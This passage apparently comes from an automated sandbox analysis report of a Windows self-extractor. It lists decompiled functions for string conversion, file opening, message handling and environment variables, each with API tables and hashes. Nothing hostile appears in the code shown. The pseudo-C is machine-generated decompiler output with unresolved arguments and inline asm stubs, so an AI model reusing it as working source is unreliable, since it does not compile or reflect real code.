              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: 99aaff26f1a174a29f2ffd364d1a1a658048547b9f945a11fba6004a309a29e7
              • Instruction ID: 8de994c0218b56f0c90c3472ad3a5f1695d9252914a92e4636e3e6323a0f2c15
              • Opcode Fuzzy Hash: 99aaff26f1a174a29f2ffd364d1a1a658048547b9f945a11fba6004a309a29e7
              • Instruction Fuzzy Hash: 3A51D170424381DADB31BF24D851ABBB7E9EF85704F08286DF4C197261E7B19988CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D995A5, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E00D995A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E00D9DBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00D8E203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E00D9980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E00D99C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E00D9980D(_t100);
									goto L36;
								}
								_t61 = E00D99C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E00D9980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E00D97A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E00DA0EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E00D99C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E00D97A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00DA0EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}


























              0x00d995aa
              0x00d995ab
              0x00d995ac
              0x00d995b3
              0x00d995b7
              0x00d995b8
              0x00d995be
              0x00d995c4
              0x00d995ca
              0x00d995cd
              0x00d995cd
              0x00d995d0
              0x00d995d2
              0x00d995d2
              0x00d995d0
              0x00d995d4
              0x00d995d9
              0x00d995e0
              0x00d995e3
              0x00d995e3
              0x00d995ff
              0x00d99605
              0x00d9960a
              0x00d9979d
              0x00d997b0
              0x00d99610
              0x00d99610
              0x00d99613
              0x00d99618
              0x00d9961c
              0x00d99670
              0x00d99670
              0x00d99672
              0x00d99674
              0x00d99792
              0x00d99792
              0x00d99794
              0x00d99795
              0x00d9979b
              0x00000000
              0x00d9979b
              0x00d99685
              0x00d9968b
              0x00d9968d
              0x00000000
              0x00000000
              0x00d99693
              0x00d996a5
              0x00d996aa
              0x00d996ae
              0x00000000
              0x00000000
              0x00d996bb
              0x00d996f5
              0x00d996f8
              0x00d996fb
              0x00d996fd
              0x00d996ff
              0x00d99701
              0x00d9974d
              0x00d9974d
              0x00d9974f
              0x00d9974f
              0x00d99751
              0x00d9978b
              0x00d9978c
              0x00000000
              0x00d99791
              0x00d99765
              0x00d9976a
              0x00d9976c
              0x00000000
              0x00000000
              0x00d99770
              0x00d99771
              0x00d99772
              0x00d99775
              0x00d997b1
              0x00d997b4
              0x00d99777
              0x00d99777
              0x00d99778
              0x00d99778
              0x00d99785
              0x00d99787
              0x00d99789
              0x00d997ba
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d99789
              0x00d99703
              0x00d99706
              0x00d99708
              0x00d9970a
              0x00d9970c
              0x00d9970f
              0x00d99714
              0x00d9972f
              0x00d99731
              0x00d9973b
              0x00d9973d
              0x00d9973e
              0x00d99740
              0x00000000
              0x00000000
              0x00d99742
              0x00d99748
              0x00d99748
              0x00000000
              0x00d99748
              0x00d99716
              0x00d99718
              0x00d9971c
              0x00d99721
              0x00d99723
              0x00d99725
              0x00000000
              0x00000000
              0x00d99727
              0x00000000
              0x00d99727
              0x00d996bd
              0x00d996c2
              0x00000000
              0x00000000
              0x00d996c8
              0x00d996ca
              0x00000000
              0x00000000
              0x00d996e6
              0x00d996ea
              0x00000000
              0x00000000
              0x00000000
              0x00d996f0
              0x00d99623
              0x00d99625
              0x00d99627
              0x00d9962f
              0x00d9964e
              0x00d99650
              0x00d9965a
              0x00d9965c
              0x00d9965d
              0x00d9965f
              0x00000000
              0x00000000
              0x00d99665
              0x00d9966b
              0x00d9966b
              0x00000000
              0x00d9966b
              0x00d99633
              0x00d99637
              0x00d9963c
              0x00d99640
              0x00000000
              0x00000000
              0x00d99646
              0x00000000
              0x00d99646

              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D9451B,00D9451B,?,?,?,00D997F6,00000001,00000001,31E85006), ref: 00D995FF
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D997F6,00000001,00000001,31E85006,?,?,?), ref: 00D99685
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D9977F
              • __freea.LIBCMT ref: 00D9978C
                • Part of subcall function 00D97A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D92FA6,?,0000015D,?,?,?,?,00D94482,000000FF,00000000,?,?), ref: 00D97ABC
              • __freea.LIBCMT ref: 00D99795
              • __freea.LIBCMT ref: 00D997BA
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: 5610ba8133262f8c87061c1bbc8b1b36fee3e925bcf4858a58f0943d8f57e13b
              • Instruction ID: a3f7b0be0dd89c85545b75906cfaa46d55752913615eb38239ba3d48a3971e97
              • Opcode Fuzzy Hash: 5610ba8133262f8c87061c1bbc8b1b36fee3e925bcf4858a58f0943d8f57e13b
              • Instruction Fuzzy Hash: 4A517072620216ABDF259FA8CCA1EBBB7AAEB44750F19462DFD05D6140EB34DC40C6B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89A32, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D89A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00D81410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








              0x00d89a42
              0x00d89a49
              0x00d89a51
              0x00d89a54
              0x00d89a61
              0x00d89a68
              0x00d89a70
              0x00d89a76
              0x00d89a76
              0x00d89a78
              0x00d89a7b
              0x00d89a80
              0x00000000
              0x00d89a80
              0x00d89a8a

              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00D89A49
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D89A80
                • Part of subcall function 00D81410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7ACFE,?,?,?,00D7ACAD,?,-00000002,?,00000000,?), ref: 00D81426
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D89A70
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT$pltv
              • API String ID: 4243998846-1976670045
              • Opcode ID: a3e411e930a48e701038240d757e1dd3a31b73f71aea2cbb4b956cec67913a4a
              • Instruction ID: 877d67becc7a6cb7d5449403abe17ed4dea487f8110112a3b5cd401c090ff3d7
              • Opcode Fuzzy Hash: a3e411e930a48e701038240d757e1dd3a31b73f71aea2cbb4b956cec67913a4a
              • Instruction Fuzzy Hash: 38F05E32A013687AD620A7659C05FEBB66C9F86B51F480166BE82E32C0D760990286F5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79768, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00D79768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E00D8D940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00D76EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E00D7FAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E00D7B32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














              0x00d79768
              0x00d7976d
              0x00d79773
              0x00d7977c
              0x00d7977e
              0x00d79789
              0x00d79794
              0x00d79790
              0x00d79790
              0x00d79790
              0x00d7979a
              0x00d797a2
              0x00d797aa
              0x00d797b3
              0x00d797b5
              0x00d797b5
              0x00d797c0
              0x00d797c5
              0x00d797c7
              0x00d797c7
              0x00d797dc
              0x00d797e0
              0x00d797e9
              0x00d797eb
              0x00d797eb
              0x00d79804
              0x00d7980a
              0x00d7980f
              0x00d79873
              0x00d79878
              0x00d7987f
              0x00d79888
              0x00d79893
              0x00d79893
              0x00d7989e
              0x00d798a1
              0x00d798a4
              0x00d798a7
              0x00d798ad
              0x00d798be
              0x00d798c2
              0x00d798c2
              0x00d798d2
              0x00d79811
              0x00d79817
              0x00d79833
              0x00d79862
              0x00d79867
              0x00d79869
              0x00d79869
              0x00000000
              0x00d79867
              0x00d7984c
              0x00d7984e
              0x00d79857
              0x00d79859
              0x00d79859
              0x00d79860
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d79860

              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D776F2,?,00000005,?,00000011), ref: 00D79804
              • GetLastError.KERNEL32(?,?,00D776F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D79811
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00D776F2,?,00000005,?), ref: 00D79846
              • GetLastError.KERNEL32(?,?,00D776F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D7984E
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D776F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D79893
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: a616ccf45d37f8eb81033609a2abc14a97edbb0c402f19cf9563c3531cb6f245
              • Instruction ID: b16e41ba9aa22cdb36c5cd5abf7954ee72d41b38b77be33c34cad058f4cd28ae
              • Opcode Fuzzy Hash: a616ccf45d37f8eb81033609a2abc14a97edbb0c402f19cf9563c3531cb6f245
              • Instruction Fuzzy Hash: B14127724447466BE3209F34CC05BEAFBE4EB02334F148719F9A8961D0E3759889CBB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8A388, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8A388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xdb75c8; // 0xf01d2
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







              0x00d8a399
              0x00d8a3a1
              0x00d8a3aa
              0x00d8a3b0
              0x00d8a3b7
              0x00d8a3c8
              0x00d8a3cc
              0x00d8a3d6
              0x00000000
              0x00d8a3d6
              0x00d8a3be
              0x00d8a3c6
              0x00000000
              0x00000000
              0x00d8a3c6
              0x00d8a3e0

              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8A399
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D8A3AA
              • IsDialogMessageW.USER32(000F01D2,?), ref: 00D8A3BE
              • TranslateMessage.USER32(?), ref: 00D8A3CC
              • DispatchMessageW.USER32(?), ref: 00D8A3D6
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 2bb4cbb2ea51e9f2615ca4cd61d8122b1bd3d111c23b518ba436a0aa24534a49
              • Instruction ID: dd12b7e78b1ce129b0bb92a7079072e3bd9f18de1cc0f3f0cfc1683d42c1c7a3
              • Opcode Fuzzy Hash: 2bb4cbb2ea51e9f2615ca4cd61d8122b1bd3d111c23b518ba436a0aa24534a49
              • Instruction Fuzzy Hash: 5CF01771905369AF9B20ABF6AC4CDEB7FACEE062A17004115B90AD2600EB68D505CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
              Download Yara Rule
              C-Code - Quality: 25%
              			E00D89AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00D7FCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xdadffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xdadeb4( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L00D8D820(); // executed
				 *0xdadf08(0xdb75c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











              0x00d89aaf
              0x00d89ab6
              0x00d89ab9
              0x00d89ac2
              0x00d89aca
              0x00d89ad1
              0x00d89adb
              0x00d89ae6
              0x00d89aea
              0x00d89aed
              0x00d89af0
              0x00d89afa
              0x00d89b07

              APIs
                • Part of subcall function 00D7FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7FD18
                • Part of subcall function 00D7FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D7E7F6,Crypt32.dll,?,00D7E878,?,00D7E85C,?,?,?,?), ref: 00D7FD3A
              • OleInitialize.OLE32(00000000), ref: 00D89AB9
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89AF0
              • SHGetMalloc.SHELL32(00DB75C0), ref: 00D89AFA
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll
              • API String ID: 3498096277-3360196438
              • Opcode ID: 3ac2c0aa97ab952e5c56debc927141fdb42736ff0c615d920b16b98838dc4cdf
              • Instruction ID: ee8c103e5a425ea3b2ab3a8e97646b3ddbf551eaabc467314f53377cad44a868
              • Opcode Fuzzy Hash: 3ac2c0aa97ab952e5c56debc927141fdb42736ff0c615d920b16b98838dc4cdf
              • Instruction Fuzzy Hash: 99F0F9B1D00209AFCB20AF99D849AEFFBFDEF95711F00416AE815E2240DBB456058BB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 66%
              			E00D8C891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00D8D940();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E00D7F835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00D7F94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







              0x00d8c891
              0x00d8c899
              0x00d8c8a7
              0x00d8c8bc
              0x00d8c8c1
              0x00d8c8c5
              0x00d8c8ca
              0x00d8c8d4
              0x00d8c8cd
              0x00d8c8cd
              0x00d8c8d3
              0x00d8c8d3
              0x00d8c8e3
              0x00d8c8e3
              0x00d8c8ed

              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8C8A7
              • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8C8E3
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: 2a741b4d8c899998a8b35f58c2bde50cb09f9d108cf576527108f1d450378dd4
              • Instruction ID: c5d10291a54d57967c4207823acef165f330f2036e9806c5e2d87e60b371e3d1
              • Opcode Fuzzy Hash: 2a741b4d8c899998a8b35f58c2bde50cb09f9d108cf576527108f1d450378dd4
              • Instruction Fuzzy Hash: 85F0A772850325EADB303FD59C0AFBA7B7DDF05751B044156FE4896242EA708841DBF1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7964A, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00D7964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00D79745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E00D7964A(_t25);
						}
					}
				}
				return _t15;
			}







              0x00d7964d
              0x00d79650
              0x00d79656
              0x00d79660
              0x00d79660
              0x00d79672
              0x00d7967a
              0x00d796d6
              0x00d7967c
              0x00d7967e
              0x00d79685
              0x00d7969e
              0x00d796a2
              0x00d796b3
              0x00d796b7
              0x00d796d1
              0x00d796d1
              0x00d796c3
              0x00d796c3
              0x00d796cc
              0x00000000
              0x00d796ce
              0x00d796ce
              0x00000000
              0x00d796ce
              0x00d796cc
              0x00d796a4
              0x00d796a4
              0x00d796ad
              0x00000000
              0x00d796af
              0x00d796af
              0x00d796af
              0x00d796ad
              0x00d79687
              0x00d79687
              0x00d7968f
              0x00000000
              0x00d79691
              0x00d79691
              0x00d79692
              0x00d79692
              0x00d79697
              0x00d79697
              0x00d7968f
              0x00d79685
              0x00d796de

              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00D7965A
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D79672
              • GetLastError.KERNEL32 ref: 00D796A4
              • GetLastError.KERNEL32 ref: 00D796C3
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
